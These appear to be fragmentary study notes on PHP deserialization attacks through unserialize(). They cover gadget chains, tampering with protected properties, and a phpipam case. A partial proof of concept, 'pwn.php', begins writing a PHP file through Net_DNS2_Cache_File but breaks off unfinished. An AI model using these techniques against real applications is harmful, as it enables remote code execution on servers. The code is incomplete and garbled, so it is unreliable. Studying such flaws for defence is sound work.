Unserialize() function on untrusted data.
Find magic methods to determine something useful. Can nest objects.
Otherwise use pre-build object gadgets for common libraries.
Eldar’s Presentation on phpipam deserialization
- ”*” in serialized object prevents modifying protected properties. If we remove it we can then modify those fields.
- Initial proof of concept ```php <?php include(“Cache.php”); include(“Cache/File.php”);
$p=new Net_DNS2_Cache_File(); print_r($p); print “\n\n”.serialize($p); ?>
+ pwn.php
```php
<?php
include("Cache.php");
include("Cache/File.php");
$p=new Net_DNS2_Cache_File();
$p->open("pwn.php", 100000);
$p->put("
?>
- Check offsets as those might need to be manually modified.
- Initialising class rather than a generic php object. +